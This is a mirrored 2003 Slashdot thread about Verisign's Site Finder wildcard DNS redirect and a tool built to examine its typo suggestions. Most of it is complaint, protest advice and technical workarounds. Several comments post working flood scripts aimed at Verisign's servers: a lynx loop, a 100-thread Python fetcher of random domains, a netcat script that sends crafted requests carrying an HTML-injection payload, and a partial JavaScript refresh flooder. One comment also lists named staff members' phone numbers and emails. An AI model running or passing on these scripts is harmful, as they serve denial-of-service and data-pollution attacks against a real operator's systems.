Slashdot Mirror
Verisign Typosquatter Explorer
jelyon quotes Seth Finkelstein's website "I have written a program " Verisign Typosquatter Explorer" in order to examine [the Verisign] suggestions [for mistyped domains]. Future data may be analyzed as interest permits.
Note tests with some domains seem to return results which are not constant, i.e. differences when the program is run repeatedly. This is not a program bug. Reloading the Verisign page also changes which squat-suggested domains are displayed. I don't believe it's an advertising rotation, but the behavior is similar to that practice."
it's amazing anybody is able to accomplish anything.
Anybody else feel like you just want to start over, with only good people involved, and remake the internet? None of this patent crap, none of this copyright bullshit, just pure standards that are actual standards. Uncompromised and pure. No restrictions on data, short of the physical line speeds.
Yeah yeah, I know..."when you wish, upon a star"
Mod me down with all of your hatred and your journey towards the dark side will be complete!
But does it matter? What Verisign is doing is wrong. Exactly how they're wrong is irrelevant.
"I don't believe it's an advertising rotation..."
It's a feature!
Two fish swim into a wall, one turns to the other and says, "Dam".
Everyone goto http://verisignneedstogetaclue.com
Don't forget to sign the petition on Verisign's abuse of the DNS system.
by Seth Finkelstein
Introduction
On Monday September 15 2003, a change to
When a URL has a misspelled domain name, Verisign's changes have the effect of redirecting every single HTTP page request (technically, HTTP response code 302). There is a redirection header and page which displays:
The document has moved here.
So, for example, the URL
http://verisign-is-to.net/more/evil/than/satan/
Gets redirected to:
http://sitefinder.verisign.com/lpc?url=verisign
This site suggests corrections to the typo. I have written a program " Verisign Typosquatter Explorer" in order to examine these suggestions. Future data may be analyzed as interest permits.
Note tests with some domains seem to return results which are not constant, i.e. differences when the program is run repeatedly. This is not a program bug. Reloading the Verisign page also changes which squat-suggested domains are displayed. I don't believe it's an advertising rotation, but the behavior is similar to that practice.
Support
This project was not supported by anyone. If anyone is providing financial support for such projects, the author would dearly like to know.
Version 1.2 September 17 2003
See also: Domain Investigations
Mail comments to: Seth Finkelstein
For future information: subscribe to Seth Finkelstein's Infothought list or read the Infothought blog
See more of Seth Finkelstein 's Anticensorware Investigations
I mailed this little lot earlier today:
authenticode-support@verisign.com, billing@verisign.com, channel-partners@verisign.com, clientpki@verisign.com, consultingsolutions@verisign.com, dbms-support@verisign.com, dcpolicy@verisign.com, digitalbranding@verisign.com, dnssales@verisign.com, enterprise-pkisupport@verisign.com, enterprise-sslsupport@verisign.com, info@verisign-grs.com, internetsales@verisign.com, IR@verisign.com, jobs@verisign.com, mss@verisign.com, objectsigning-support@verisign.com, paymentsales@verisign.com, practices@verisign.com, premiersupport@networksolutions.com, press@verisign.com, privacy@networksolutions.com, renewal@verisign.com, support@verisign.com, verisales@verisign.com, vps-support@verisign.com, vts-csrgroup@verisign.com, vts-mktginfo@verisign.com, webhelp@verisign.com, websitesales@verisign.com, websitesupport@verisign.com
And I got a bunch of replies back, including *gasp* two written by actual human beings!
Remember folks, if you're going to write and complain, try and keep it civil. The porr bugger who hsa to read your complaint isn't the same person who actually took the decision to introduce sitefinder!
A little planning goes a long way...
You don't think they have esoteric "we should HELP the Internet" type idea in mind, do you?
Advertising rotation... absolutely! They're after the ad revinue. These types of things should come as no shock.
Stewey
There are 10 kinds of people in the world. Those who understand binary and those who don't.
Looks like you've /.-ed Seth's website.
time on your hands...
So what do you do when you WANT to get a "domain cannot be found" error for troubleshooting purposes... I know it sounds weird, but this whole thing is very annoying.
R-
Hard loop..... huh?
Dynamic Designs
If I make a type for "slashdot" such as salhsdtot.com it suggests goatse.cx as a top candidate. That's some pretty smart AI VeriSign has.
Trolling is a art,
I cannot get to 64.94.110.11.
Either it is not responding, or our network is blocking it.
Here is a mirror of the site in case it goes down: http://www.madcowworld.com/sethf.com/domains/veris quat/
So verisign too is now stalked by seth?
I read your last sentence as "Capitalism isn't bad, you're just a canine"
Hey, I'm outraged and mad too, like all of you.. but, I'm not seeing this. Maybe my ISPs have taken a stand with their DNS, but both my work and home ISPs? Unlikely. Why aren't I seeing this?
# Erik
Congrats, you're the next sucker that's going to be sued under the DMCA.
Well here in Canada it doesn't appear to have an effect on us. I get the usual 404 error when a site can't be found or resolved. Guess its only available or rather they're testing it in the US only.
He supported freedom of speech.
If the two have come into such severe conflict perhaps something really has gone wrong with capitalism "as she is spoke."
There is a difference between capitalism and commercial anarchy. One of them follows rules of law. I'll give you two guesses which one.
KFG
How is this any different from me buying mispelled domains to profit off other company's trademarks? I know the Federal Government just tossed a guy in jail for doing the same thing. There is something that stinks to high heaven about this. It looks like they are abusing their right to manage the USA TLDs along with violating RFCs.
Strange women lying in ponds distributing swords is no basis for a system of government.
Not even when they get 5000 signatures in 24 hours?
If a large number of /.ers were to run a short script that tried to resolve random nonexistent domains, how long would it be before the root servers crashed?
/.ing the root servers.
Don't forget, YOU would not have done anything but asked your ISP's DNS for info. IT will be the one
Not that I suggest you do this.
The latest Slashdot meme.
What is news worthy about this? This doesn't provide any statistics by itself. There is no wrapper scripts to actually match anything. All this does is parse the response page to display suggested hits. It's not even written that well.
It prints the suggested URLs out and then what? This isn't an explorer, it's a shitty data dump.
Besides, I thought Michael hated Seth. How did this story get posted?
Dacels Jewelers can't be trusted.
Petitions are pathetic per se, but e-mail/web petitions carry absolutely no weight at all.
I've worked for professional politicians. The web/e-mail opinion is irrelevant. If you want to be counted (not heard, mind you) send a letter or a fax.
BOO! TERRO
What sort of monetary damages is this action by Verisign incurring for people and businesses everywhere?
Verisign's action was most probably intended for web traffic, where it's at least an annoyance. But since the DNS is an independent system from the web that's used by all sorts of services, it's undoubtedly breaking all sorts of non-web things out there that rely on knowing accurately if a domain name exists... not to mention all of the additional maintenance time. Email and spam filters are the two that seem to've been brought up a lot.
So far I've seen a lot of people getting mad and I am too, but I haven't seen anyone actually state how much they're losing due to the sudden change and breaking of standards by Verisign. Is anyone confident to put an amount on this?
I tried the various examples in the previous comments, and my connection always times out never gets redirected like the exa,ple link in the story. Tried it in opera and IE.
Is this just something verisign is planning on implemeting or is it supposed to be in place already?
PAGERANK++ Robsell.com
Everybody go here. Go again.
Hear that? That's the sound of their redirection server being slashdotted. I wonder how much traffic they've calculated this would bring, and if they've thought it through.
(At least, I'm getting 'Cannot be displayed' errors. Whether that's because their getting flooded, or because they've already given up, or for some reason this and the example in the article aren't going through them.)
R: That voice. Where have I heard that voice before? B: In about 365 other episodes. But I don't know who it is either.
while [ 1 ]; do lynx --source http://sitefinder.verisign.com/spc?sb=FUCK+YOU+VER ISIGN\&searchboxtype=1\&op=landing\&search=Sea rch > /dev/null ; done
This is news? Good god. I wish we could mod whole stories down... ;-(
-- I am. Therefore, I think!
Seriously, would it be possible for ISP's to file a class action suit? I have spent ALL day (so far) dealing with the repurcussions of this blatant misuse of authority. I know others out there are dealing with the same. I also had two customers get .ws websites rather than AVAILABLE .com sites because they use the method of putting the name in the browser and seeing if a site comes up. They figured verisign was squatting on the domain, and thought they would have to pay verisign for the use of the domain.
On a side note...
Our mail servers are filling up with spam, and with the recent loss of SPEWS, our spam filtering system is basically useless.. save for the few other blacklist sites still out there. Spammers must be rejoicing today.
Fuck you VeriSign, Fuck you very much.
Everyone is entitled to their own opinion. It's just that yours is stupid.
So far I have had 4 O-O-O autoresponders and a thanks for submitting your resume.
I work for the U.S. Forest Service, and guess what? Our DNS servers don't redirect us to the VeriSign crap. We still get a good old-fashioned error message. Yippee!
Not to give anyone any ideas, but wouldn't it be poetic justice if, say, all the unused phone numbers in the US were suddenly directed to Verisign's toll-free line.
Well, this is finally working for me now!
Man, did you check out their "terms of service"? That shit is hilarious!
" 14. By using the service(s) provided by VeriSign under these Terms of Use, you acknowledge that you have read and agree to be bound by all terms and conditions here in and documents incorporated by reference."
HOW THE FUCK AM I SUPPOSED TO READ AND AGREE TO BE BOUND TO TERMS, when I arrived at the site by mis-typing a domain name????
From the privacy policy:
"Under no circumstances do we collect any personal data revealing racial or ethnic origin, political opinions, religious or philosophical beliefs, trade union membership, health, or sex life."
No? What about when I go to any political site, sex site, health site, religious site, etc, and don't type the domain name correctly?
http://www.sitefinderreallyreallysucks.com/
Closed source code that's this short?
God help us all!
If you could be told what you can see or read, then it follows that you could be told what to say or think - BoC
Because sitefinder-idn.verisign.com runs Linux, and now 99.99999999% of all domains now point to it, almost 100% of the Internet is now running Linux!
Verisign was contracted to run DNS servers for the .com and .net top-level domains; both of which are in practice "flat" address spaces, with no formalised lower-level hierarchy. If an organisation registers the domain "foo.com", implements nameservers for this domain, and then these nameservers ignore accepted practice and the way the majority of Internet applications expect the nameservice to work - then the organisation shoots only itself in the foot.
Verisign is in effect treating the entire top-level .com and .net domains as its corporate property.
If Verisign were genuinely ignorant of the effects of their move, then the company is not competent to operate TLD DNS services. If Verisgn were aware of the potential problems their decision could cause and went ahead regardless for commercial reasons then the company is not fit to operate TLD DNS services.
If ICANN cannot react to this nonsense in less than a working week, ICANN itself is not fit to direct the Internet naming service.
Apart from massed armies of geeks with pitchforks and flaming torches converging on Verisign and ICANN locations, does anyone have any constructive suggestions on how to get the parasites out of the loop?
Like I said, get a clue
I think most people know how jealous Verizon is of it's name even in url's. I'm curious how they'll view someone who misstypes a verizon adress and is presented with ad's from their competitors.
So I've had a couple of ideas of how we could express our displeasure in this:
* a cron entry that runs every minute or two, and hits port 80 on verisign's webserver farm.
* infrequent ping- like 1 every 30 seconds
With enough people, this would becomre more than an annoyance. But I'm looking for better ideas. Anyone? Bueller?
Write a little script that hits http://www.verisignsuxhard.com every 30 seconds. If you pass this around to enough geeks, eventually we can have our trusty old error back...
- sigs are stupid
MOD PARENT DOWN, CONTAINS GOATSE.CX LINK
Reason: Don't use so many caps. It's like YELLING.
Does anyone have any idea how an application (or even resolver) writer could workaround this?
All the solutions I've come up with can be defeated by having verisign rotate their IP addresses or domain (sitefinder.verisign.com)
What is BIND doing?
Martin Brooks / Slayer99 #linux / UIN 2178117
First off, the ROOT servers just serve the root domain "." (plus arpa, in-addr.arpa, and a few other glue zones AFAIK). You mean the gTLD servers. The root servers delegate queries for .com and .net to the gTLD servers for those domains, at least some of which which are run by Verisign.
.com/.net zones. Either one will just anger people who would otherwise be on our side.
Second, crashing the gTLD servers (and making the cache on your ISP's DNS servers grow overly large) will only piss off the general public. Pissing off the public is NOT a way to get ICANN to yank Verisign's chain.
If you must send Verisign a message via your queries (and I'm not saying you should), use HTTP queries to ONE or TWO domains (www.hey-verisign-get-a-clue.com or somesuch), using wget, lynx, or your web browser's force-reload (shift-click in my part of reality). If they're logging anything at all -- which they probably will if traffic becomes overwhelming -- they might get the hint.
But please don't go after the root servers -- they're all run by decent people who are as upset by this as the rest of us -- or shut down DNS for the
I'm not supposed to get jigs in it!
I wrote an email today to NetSol/VeriSign to voice my displeasure. As I have 5 or so domains up for renewal in October, along with various web and email hosting features that go along with them that are currently with NetSol. I told them that I would be moving everything to another registrar should they not have rescinded their change by my renewal date.
I know that my $300 a year may not be the end of the world to them, but I thought it important that they know that some people will make buying decisions based on this. And the types of people that handle DNS registration issues are just the types of people to be ticked off by this.
They sent me a form letter response, that addressed both this new unregistered DNS feature as well as the "register in advance for about-to-expire domains" feature that I didn't mention at all in my email. Their response to that issue was also defensive, so I take it that they're getting an earful on that one as well.
The parent post properly answers grub's question (which implied that a positive answer was not possible)
verisign-are-rfc-ignoranti sign-resolve-nothingr isign-cannot-be-trusteda ddys
verisignneedaclue
ver
verisign-squat-for-cash
ve
verisign-harvests-email-
verisign-supports-spammers
If it were a Linux program it would be called kvtse or gvtse depending on whether it's for Gnome or KDE.
-Lucas
here is the original message i sent:
.com and .net top-level domains. Before this service was
implemented, when a user entered a URL containing a nonexistent (e.g.,
unregistered) domain name ending in .com or .net, their web browser
returned an error message that contained no useful information. With
the introduction of Site Finder, users now receive a helpful web page
offering links to possible intended destinations, related categories,
and the ability to conduct additional searches immediately.
For more information, please email: sitefinder@verisign-grs.com
:( what has the world come to. sad.
Verisign has continually been abusing the power that has been handed out to them. Two such examples are its mailing of false renewal notices, and its most recent exploit: sitefinder.verisign.com. Now, nearly all mistyped names will be sent to Verisign where they can do whatever they like to the unwitting user. There are even categories on sitefinder.verisign.com where one can browse and go to sites which are undoubtedly paying Verisign for the space. Please take this, and the hundreds or thousands of e-mails you will receive, into consideration, and exercise the power that ICANN has. Verisign has continually been abusing and tricking people through deceptive business practices, and this should be the last straw. Verisign should not only be removed from it's post, but it should also be fined for its numerous escapades designed to make money. Sincerely, Jay Taylor
here are the replies so far:
enterprise-pkisupport@verisign.com
Site Finder Service
VeriSign's Site Finder service improves the web browsing experience when the user has submitted a query for a nonexistent second-level domain name in the
CustomerService@NetworkSolutions.com
Dear Mr. Taylor,
Thank you for contacting Network Solutions.
We apologize for the inconvenience you are experiencing.
Much to our regret, we may not be able to assist you with your concern, as what you are encountering is a system recently applied by the Global Registry.
Site Finder is a new service offered by the VeriSign Global Registry. For more information, please contact VeriSign at sitefinder@verisign-grs.com
Please know that your inquiry is important to us, and we value your business.
Best regards,
Edwin001 Network Solutions, Inc.
improves the web-browsing experience my ass...abuses a monopoly is more like it. oh ya, they forgot to mention how much extra revenue it would generate for them. sLeAzEy.
also- here is the list of emails that i sent the msg to:
authenticode-support@verisign.com; billing@verisign.com; channel-partners@verisign.com; clientpki@verisign.com; consultingsolutions@verisign.com; dbms-support@verisign.com; dcpolicy@verisign.com; digitalbranding@verisign.com; dnssales@verisign.com; enterprise-pkisupport@verisign.com; enterprise-sslsupport@verisign.com; info@verisign-grs.com; internetsales@verisign.com; IR@verisign.com; jobs@verisign.com; mss@verisign.com; objectsigning-support@verisign.com; paymentsales@verisign.com; practices@verisign.com; premiersupport@networksolutions.com; press@verisign.com; privacy@networksolutions.com; renewal@verisign.com; support@verisign.com; verisales@verisign.com; vps-support@verisign.com; vts-csrgroup@verisign.com; vts-mktginfo@verisign.com; webhelp@verisign.com; websitesales@verisign.com; websitesupport@verisign.com
(\(\
(^.^)
(")")
Saving sig aborted.
Reason: Your subject looks too much like ascii art
frosty piss!!
...that tries to open 100 connections to randomly named servers and keep them up. It works prettily well considered that these servers don't exist...
/usr/local/bin/python2
b sp; try:
Please, try it on your machines. (... and prepare an excuse to your ISP.)
#!
import random, urllib, time
from thread import *
CONCURRENT=100
random.seed(time.time())
def rndname(n):
s=""
for i in range(n):
s+=chr(64+random.randint(1,26))
return s
def kickem():
while 1:
s="www."+rndname(random.randint(5,14))+".com"
&n
urllib.urlretrieve("http://"+s, "/dev/null")
except:
pass
for i in range(CONCURRENT):
start_new_thread(kickem, ())
while 1:
time.sleep(600)
-Lucas
WTF? yuo FAILED IT!!
i always get 'connection timed out' i just figured it was
/. typod link (and fark and where ever else)
/. effect.
1) all that bounced spam found a place to go
2) a
3) more people with fat fingers like me then you can shake a cheeseburger at.
4) a dictionary spam attack w/ the dicttionary used for the domain name too.
causing a perpetual
You are just embarassing yourself.
verisignsucks.com
.com left?
Is this the only
What's to keep Verisign or another TLD registrar from doing a wildcard like this in order to harvest the valid email addresses of everyone who accidentally makes a typo in a domain name?
;-)
They could compile a huge spam list that way. How would we know if they decided to do this?
Could they also harvest the content of your emails?
If they're willing to run an HTTP wildcard site, what might they be willing to do with SMTP?
Verisign should be stopped before they abuse their potential power. Just like Iraq.
Whadda'ya say, Dubya?
Any lawyers out there want to send the C&D for me?
-- Erich
Slashdot reader since 1997
Official response is here
Essentially, they state that this change violates the RFC for DNS for several reasons. They are creating an IETF working group to recommended practices for implementing DNS, above and beyond what the RFC requires. Unfortunately, there is no mention of any action, or even censure.
Besides the obvious fact that VeriSign is making massive changes on a whim, why is this bad? There are a slew of reasons why I, too, object -- but they're all on principle (it violates the RFC, it's scary as hell that they can do this unchecked, etc.) -- I'm still yet to find something that is actually broken by this.
Can someone provide some concrete examples of problems this causes?
________________________________________________
suwain_2
fleem@linux [~/dl] $ host fleemgoats.com
...
fleemgoats.com has address 64.94.110.11
fleem@linux [~/dl] $ host 64.94.110.11
11.110.94.64.in-addr.arpa domain name pointer sitefinder-idn.verisign.com.
root@smoothwall~# iptables -t filter -I OUTPUT -d 64.94.110.11 -j DROP
root@smoothwall~# iptables -t filter -I FORWARD -d 64.94.110.11 -j DROP
Why is it that many people who claim to support standards have such atrocious spelling and grammar?
verisquat.pl `cat King_James_Unabridged_Bible.txt`
'nuff said.
Please sign: http://www.petitiononline.com/icanndns/petition.ht ml
Here
Somewhat off-topic, but relevant to the whole Verisign DNS idiocy... I have thrown up a database of patched nameservers here (don't worry about arouse.net, it's not a porn site), which currently allows you to check to see if a nameserver has been patched to block return of 'A' results for non-existent domains, and allows you to add to the database if it is a patched server.
I can't believe how this thing will redirect a web page. You would think that a domain like slashdot.org would resolve correctly. But check this out...
Linky
Can you ping me now?... Good!
You may like mistyped URIs to go to a search engine but do you like your mis-typed email addresses resulting in your mail being sent to Verisign?
There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
I wonder when Netcraft is going to acknowledge and adjust its database to ignore bogus domains.
dance around innocence begging for a retaliatory response. Putting non-combatence in harms way. I've waited seven years for them to step out from behind the child, I'll wait another forty.
Don't be dupped, their the ones selling your genitals, the color of your skin, your freedom.
OK, how about this one:
3 25 0
http://slashdot.org/article.pl?sid=03/09/16/192
It was only yesterday -- the Senate voted to roll back the FCC media consolidation ruling, based to some extent on the MoveOn petition. Check out the picture of Trent Lott standing next to 360,000 pieces of paper. One of those is mine, and it looks like it carried some weight to me.
I went to school with Eli Pariser, btw -- he's one of the guys who runs MoveOn. Check out what else they've done to see how online activism can be effective.
nt
--
haha.. you got me there.
:-P
Thanks!!
Esoteric words like altruistic seem to befuddle me sometimes.
Eschew Obfuscation...
Stewey
There are 10 kinds of people in the world. Those who understand binary and those who don't.
That's not Seth. Seth (90154) knows how to spell his last name.
What's an HTTP domain name query? Please tell me how to use nothing but port 80 and an HTTP GET to resolve a domain name. What am I missing in your post?
So based on the info in his article, all you have to do to stop this is create an entry in your /etc/hosts file pointing sitefinder.verisign.com to a non-answering ip address such as 127.0.0.1 (assuming you are not running a web server on your desktop.) Once BIND is fixed comment it out.
Looks like Verisign is being stalked by Seth
Could this be a sign that Verisign is about to become a slashdot editor?
PS: for some reason censorware.org and stalkedbyseth.com are not responding... the link is to google cash.
-pyrrho
I think he means that it would be a good idea just to flood verisign's HTTP server. The point being they'd see the same stuff in the GET params over and over, and maybe take the hint (though I doubt it). No point in going through the failed DSN route just to do that...
Verizon!=Verisign, they just have simular names that's all.
>I would like to see just one online petition that has carried any weight.
There was a success with webtv, its probably still linked at the petition site, but unless someone prints these damn things out and hands them to the politicos (like in this photo from moveon.org) its a waste of bits.
whoops, fuck, I meant "DNS". keyboards suck.
No mystery here. The results on Verisign's dipshit new unservice are provided by paid-listings search engine Overture, now owned by yahoo.
Dear Seth:
I'm not Seth.
Sincerely,
Seth.
Folks, this DNS standards violation has pissed off anyone that knows that the Internet only works and only remains vibrant when there's a system of open standards people adhere to to make things work.
The root server wildcard concept does irk me greatly, but what irks me more is that VeriSign decided to just change a standard behaviour *WITHOUT* asking the rest of the world first through standards bodies if it was acceptable. Add to that it's about profit, not "enhancing the user experience".
Ranting about this in SlashDot and in online petitions, while definitely good in a Digital Democracy, doesn't get as much attention as phone calls, but most importantly.
PAPER MAIL.
If you think this issue is important, write VeriSign. Write every member of the Board of Directors and any legally obtainable public mail address you can find and tell them POLITELY how you feel, and how you will NEVER buy services from them again because of this.
WRITE your local Congress people, and inform them that the entity they entrusted a core function of the Internet with now opened up our entire digital economy to risk because of ONE company's decision to profiteer. Tell them how this has PERSONALLY affected YOU.
Get OFF YOUR DUFF, grab some stamps, and spend the two bucks and twenty minutes it will take.
We're supposed to be a REPRESENTATIVE DEMOCRACY here in the U.S., people.
START PARTICIPATING.
#!/bin/bash
/${fakedom} HTTP/1.1
/lpc?url='%3E%3Cfont%20size=+5%20color=%23FF0000%3 E\
#
#Replace dumbwordlist if you like with nonsense
#that will be used to fill up Verisign's database
#with useless crap.
#To make it eviler, remove the $((RANDOM%10)) parts,
#or maybe wrap the inner loops with an outer loop that
#picks a random postfix and asks for all of the
#domains ending, with that prefix, 10 times or so.
#Since the stuff should get asked for repeatedly,
#maybe they'll get "false positives".
#
#Also note that this simulates the first request to
#the siteverifier page, which sends a redirect to the
#real page with the ads and links on it. We ignore it
#and send the second request, knowing full well what
#the first one looked like. Hopefully this "seems"
#legitimate on their end.
#
#Your ISP may have already null-routed 64.94.110.11;
#if so this script will hang with no output.
#To remedy, remove the first nc command (up to the first
# %%EOF%%). Leave the second one, as it appears
#that one is still visible. If both are invisible, your
#ISP has _really_ gone the distance to piss of Verisign
#
#Kudos!
dumbwordlist="rem0te br4nd sar1n flau7a mickst3r robbi3 ch3my jjopppl fuckkksl ncmaster df753 klopuier beeiosla cuntwh4ccker openinsertcl oofignet phaconspal qrrtioe sumnsan rx30sony popopospospposp llqksjajjq0 aslashji aklhjk3421 halff liveees ttooowo toowoo aslllkoq"
for each in $dumbwordlist;
do
for eachi in $dumbwordlist;
do fakedom=$each$((RANDOM%10))$eachi$((RANDOM%10));
nc 64.94.110.11 80 <<%%EOF%%
GET
Host: ${fakedom}.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
%%EOF%%
nc 12.158.80.10 80 <<%%EOF%%
GET
VERISIGN%20SUCKS%20MY%20${fakedom}%3C/font%3E HTTP/1.1
Host: sitefinder.verisign.com
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
%%EOF%%
done
done
Fuck Beta. Fuck Dice
Between the two, if I had to choose which one is better suited to the environment, it would be cats.
....
Observe:
Dog 1: What happen?
Dog 2: Someone set up us the bomb
Dog 3: We get signal
Dog 1: What!
Dog 3: Main screen turn on.
Dog 1: It's you!!
Cats: How are you gentlemen!!
Cats: All your base are belong to us
Cats: You are on the way to destruction
Dog 1: What you say?
Cats: You have no chance to survive make your time
Cats: Ha ha ha
Dog 3: Captain!!
Dog 1: Take off every 'ZIG'!!
Dog 1: Move 'ZIG'.
Dog 1: For great justice.
See? Cats win every time.
They've just shot themselves in the foot, you know. Now worms from all over can hit them with random non-resolving .com/.net queries, hard, and they can't simply point them at 127.0.0.1 like windowsupdate did. I wonder if they are expecting this?
"Your superior intellect is no match for our puny weapons!"
Dude,
You gotta, like, get professional language-ified an' stuff, 'cos those suits don't give one damn about 17 year old kids.
Your letter reads a like Ellen Feiss:
"So I was surfing the internet on my PC, when VeriSign redirecteded my mispelled domain name.... BEEP BEEP BEEP BEEP BEEP BEEP. They're hijacking the internet.... it's such............ a bummer."
The other DNS registrars should sue Verisign for all those domains that they are illegally using and not paying for.
Everybody else has to pay $ for a domain name, and so should Verisign be forced to pay for all those domain names they now are using. Suitably they could pay FSF.
If you are unhappy with Verisigns piracy then just call their 800 number and support the phone company.
It happened yesterday, but I'm not seeing it today...
(from )
At any time VeriSign may modify or terminate these terms of use...Your continued use of the VeriSign Services constitutes your agreement to all such terms, conditions, and notices.
So, essentially, typos now enter everyone into a license?
Wer mit Ungeheuern kämpft, mag zusehn, dass er nicht dabei zum Ungeheuer wird. --Nietzsche
If you do not want to "participate" in this site finder malarky, and find the contract questionable, I suggest you FAX the legal department at Verisign.
Not only will this make the legal team at Verisign (who must be paid lots and lots of money an hour) have to read through your document, refusal etc, (otherwise they might miss a valid claim), it will also give them cause to consider the statements and costs which you make...
Fax USA 1 650 961 7300
Marked "Attention: Legal"
hey the grandparent is just some random british guy (me) who only just realized that the seth account posting on slashdot is a fake and thought he should let someone know.....
What browser are you using to test this, because Firebird just says it times out? Perhaps my ISP pulled a workaround, but I have yet to get a Verisign page.
To celebrate the occasion of my 1000th post, I will post no more forever on Slashdot. Goodbye.
[red]$ host weriowerwer.com
weriowerwer.com. has address 64.94.110.11
[red]$ host -t mx weriowerwer.com
[red]$
The MX record determines where mail gets sent.
Try spews.bl.reynolds.net.au. But I'm surprised that an absence of SPEWS made a big difference to your filtering - I find that they block very little.
Otherwise, agreed.
The IP adress is being blocked. But using IE there is a simple way to see this in action. What you do is open IE, put in a bogus address and notice that it successfully finds it and then can't load it. To see what is -suppose- to happen, unplug your network/modem connection and then try to load a new bogus page (because of caching). See how it gets stuck on the "Finding Page" message, that's because it can't find the IP adress in the DNS. That's suppose to happen.
No, I'm New Here
And it depends on the content as well as the medium. My fax was original, business-like, and carefully-argued, though partly based on stuff available online. I suspect that originality, literacy, clarity, conciseness, and focus all count well, just as obvious copying, rambling, pointless emotion, length, and lack of focus will make a communication less likely to be read or acted upon. You need to state carefully but briefly the problem, the cause, what you're asking your representative to do, and why; if you do that politely, it'd be an inconsiderate person who didn't at least reply, whatever the medium.
I suspect that the reason online petitions often don't seem to count is less that they're online, and more that they're petitions; without a direct, personal request for action, any communication will have less weight.
Ceterum censeo subscriptionem esse delendam.
The company behind the .nu addreses (www.nunames.nu) has used this practise with not returning a proper domain not existant error message as long as I can remember. Instead you get to a page with info where you can sign up for this .nu address.
.com and .net are _far_ more used than .nu addresses, but it's still the same principal, right?
I realize that
Here is contact info for the creeps who wrote those "Application Developers' Guide" and "Best Practices" whitepapers to instruct all of us in how to bend over and take it from Verisign.
Matt Larson
Phone: +1 703 948-3239
mlarson@verisign.com
Scott Hollenbeck
Phone: +1-703-948-3257
FAX: +1-703-421-0064
shollenbeck@verisign.com
Yes, Verisign is evil and the *.com thing is ridiculous. But they may be rotating typo-corretions in order to gather data. They probably want to come up w/ a better typo-correcting method, and that seems a good way to do it. Not that I approve. Boy, once they get a few thousand people hitting the same typo, do you think a "sister company" will register the domain?
Sneaky bastards.
Verisign's Developer's Guide to DNS Wildcards
If you visit his site. You have been warned.
Dear Verisign:
:: cto@***********.com
I am the CTO of ******* Corporation, operator of several leading ******** portals. Your company has very recently hijacked the open DNS system and broken the name resolution RFCs by giving false IN responses to queries that should result in NXDOMAIN responses. This results, in some cases, is sending visitors to your "Verisign Site Finder" service. This action does and will continue to impact our business's ability to troubleshoot our networks and WAN connections as effectively as we have in the past.
You most likely do not understand the concept of ethical business practices, but I am sure you will understand the following:
My company currently manages over 100 domain names and eight SSL certificates, all through Network Solutions/Verisign Services. As you know, you have many competitors for domain registration and SSL Certificate services. If you continue the abovementioned despicable business practices, I intend to renew our services with non-Verisign competitors.
--
o ***** *. ******
o Chief Technology Officer
o ******* Corporation
Check it out...
BIND delegation-only patch:
From the verisign-grs.com WHOIS:
Administrative Contract:
VERISIGN GLOBAL REGISTRY SERVICES rcc@verisign.com
21345 Ridgetop Circle
Dulles, VA 20166
US
703-742-0400 fax: 703-421-6703
Dunno how correct it is...god forbid that Verisign should put incorrect info in the whois database.
Be careful when browsing; if you're accepting cookies, they're tracking you! That's why they get called VeriSlime. I got my wife to do a cool slimy logo for them. http://www.seebs.net/log/archives/000065.html
My blog: http://www.seebs.net/log/ --- My iPhone/iPad app: http://www.seebs.net/seebsfrac/
It was only yesterday -- the Senate voted to roll back the FCC media consolidation ruling, based to some extent on the MoveOn petition.
Post hoc ergo propter hoc. After that therefore because of that. It's a common fallacy of logic, along with being the root of much of athletes' superstition (not shaving until a baseball pitcher loses, etc). Simply because Congress finally got something right doesn't mean you, MoveOn, or any one action in particular had anything at all to do with it.
Personally, I think it was because Clearchannel simply was late in mailing out their bribe^Wdonations, but that's just me.
The truth about Scientology, Xenu, and you: Operation Clambake
ICANN gets another three years to run dns. Way to go Department of Commerce! I hope this clears up any impression that ICANN's efficacy matters one whit.
The truth about Scientology, Xenu, and you: Operation Clambake
Is this going to be another .COM bust? It might be the beginning of the end for .COM & .NET (it is for me at least :), but certainly not of the Internet as we know and love to hate it. If everybody jumps one way or the other NOW we can all just BLOCK .COM and .NET traffic probably within a year or two.
.US category. Unfortunately they're also currently held by ... Verisign. I do believe that .US is, however, authoritatively not handled by "them" and most definitely (and will be) moved to another provider.
.COM and .NET. Effective immediately we've moved from .COM to .US
.ORG (non-profit) with the current economy recently... :)
Thankfully I had the fore-site to also register all my domains in the
I handle all my own traffic 100% (including DNS) -- and it appears that Verisign can only pull this stunt with
Though I'm also considering a couple of the domains for
Correct me if I'm wrong here. This sounds like fertile ground for all those 15 year old virus writers out there, if they're not working on it as I speak. A virus could be written to do a continuous http GET '/' to some random domain name, containing a random number of characters ending in .COM or .NET.
Once in a while, chance would have it actually spell out microsoft.com or slashdot.com, but 99.999% percent of the time it would resolve to Verisign's servers. If it created the proper headers to mimic the IE browser, for instance, it would be indistinguishable from the requests of a really bad typist. Would versign's servers be able to handle that?
Say about them what you want but I admire VeriSign's new ad campaign.
Sincerely,
Pan Tarhei Hosé, PhD.
"Homo sum et cogito ergo odi profanum vulgus et libido."
Was your Cat5 disconnected during the entire span of the All Your Base meme?
.au domain, I'm pleased to tell you that Microsoft has released a localized version of Windows 2000 just for you.
Free clue:
"CATS" was the name of the evil alien who claimed that "All your base were belong to [him]," therefore there is at least a modicum of humor in the original post, based on the fact that there is some word play.
There's no precident for your s/cats/dogs replacement, as there's no such "DOGS" character in the whole AYBABTU meme.
Based on your
HTH. HAND.
Email validation is screwed up by this right? So signing up for lots of porn spam on nonexistent domains would work? Who get's the incorrect email?
Wonder if Verisign's mail servers are in 'catch all' mode?
My ISP actually has a clue, and set their DNS to only use "NS delegation" for .com and .net, so Verisigns wildcards have no effect whatsoever.
Ceci n'est pas une
Your wish list is all very well, but what happens when someone wants to join your internet who disagrees with your ideals?
It ain't illegal to make typos when entering urls, is it?
;-)
//--]
Paste this into the header of a new empty html file, run a search & replace on all [ and ] by angular brackets, open it. Right now it only takes a couple of seconds per refresh here, but a few 1000 of these running should be enough to change that
Diclaimer: only tested in IExploder, no guarantee that it isn't using windows-specific stuff. I'm not really that much of a web author.
[script type="text/javascript" language="javascript"]
[!--
function renew()
{
var i;
var s, url, host, fullurl;
s="";
for(i=0;i[8;i++)s = s + String.fromCharCode(Math.random()*26+97);
host = s + ".com";
url = "www." + host;
